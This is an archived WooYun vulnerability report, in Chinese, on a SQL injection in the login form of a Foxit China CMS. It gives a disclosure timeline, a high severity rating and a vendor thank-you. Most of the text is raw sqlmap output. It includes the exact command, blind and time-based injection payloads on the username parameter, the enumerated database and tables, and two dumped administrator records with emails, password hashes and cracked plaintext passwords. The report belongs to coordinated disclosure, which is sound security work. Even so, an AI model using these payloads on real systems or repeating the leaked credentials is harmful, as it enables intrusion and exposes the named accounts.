乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-07: 细节已通知厂商并且等待厂商处理中 2013-11-09: 厂商已经确认,细节仅向厂商公开 2013-11-19: 细节向核心白帽子及相关领域专家公开 2013-11-29: 细节向普通白帽子公开 2013-12-09: 细节向实习白帽子公开 2013-12-22: 细节向公众公开
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.foxitsoftware.cn/cms/index.php?ac=login" --data "password=e&random=0.3844995207618922&username=lucky" --level=3 --risk=5 --dbs---Place: POSTParameter: username Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: password=e&random=0.3844995207618922&username=-2879') OR (3426=3426)# Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: password=e&random=0.3844995207618922&username=lucky') AND 4549=BENCHMARK(5000000,MD5(0x7a567557)) AND ('zfGb'='zfGb---available databases [2]:[*] information_schema[*] newsDatabase: news[43 tables]+----------------------+| Copy_of_chr_prize || chr_error_log || chr_prize || chr_user_info || counter_ent_user || counter_volume || download_cate || download_packages || download_products || foxit_admin || foxit_login_history || foxit_online || foxit_operation || foxit_position || free_support || fx_announcement || fx_manage || fx_platform || fx_ticket || fx_ticket_back || group_buying || hd_eslick_user_info || internal_user || list_send_info || mail_content_info || product_info || refer_info || sfc_leads || shop_logs || shop_orders || shop_orders_products || shop_pay_channels || shop_price || shop_products || shop_promotion || shop_questionnaire || shop_shipinfo || shop_user || user_info || user_list_info || user_preunsub_info || user_refer_info || verify_info |+----------------------+Database: newsTable: foxit_admin[15 columns]+----------------+----------------------+| Column | Type |+----------------+----------------------+| department_id | smallint(4) unsigned || email | varchar(60) || id | int(11) || ip | varchar(16) || lastUserID | varchar(25) || login_time | datetime || LoginFailCount | tinyint(1) unsigned || office_id | tinyint(2) unsigned || password | varchar(60) || permissions | text || reg_time | datetime || rights_list | varchar(128) || status | char(1) || user_power | tinyint(2) unsigned || username | varbinary(20) |+----------------+----------------------+Database: newsTable: foxit_admin[2 entries]+----+-----------+------------------+---------------+----+-------------------------------+--------+---------------------+-------------+------------------------------------------+------------+---------------------+-------------+--------------+----------------+| id | office_id | lastUserID | department_id | ip | email | status | reg_time | username | password | user_power | login_time | rights_list | permissions | LoginFailCount |+----+-----------+------------------+---------------+----+-------------------------------+--------+---------------------+-------------+------------------------------------------+------------+---------------------+-------------+--------------+----------------+| 1 | 0 | 1303061138338047 | 0 | <blank> | [email protected] | N | 2011-10-18 01:03:38 | Snatch_Wylb | 9f6e6800cfae7749eb6c486619254b9c (sss) | 5 | 2013-03-06 23:38:33 | <blank> | VO,SC,MN | 0 || 2 | 0 | 1303070137369563 | 0 | <blank> | [email protected] | N | 2011-10-18 01:03:38 | Julia | c2e285cb33cecdbeb83d2189e983a8c0 (julia) | 5 | 2013-03-07 01:37:36 | <blank> | VO,SC,MN\r\n | 0 |+----+-----------+------------------+---------------+----+-------------------------------+--------+---------------------+-------------+------------------------------------------+------------+---------------------+-------------+--------------+----------------+
危害等级:高
漏洞Rank:12
确认时间:2013-11-09 00:54
已提交管理员处理,感谢lucky。
暂无
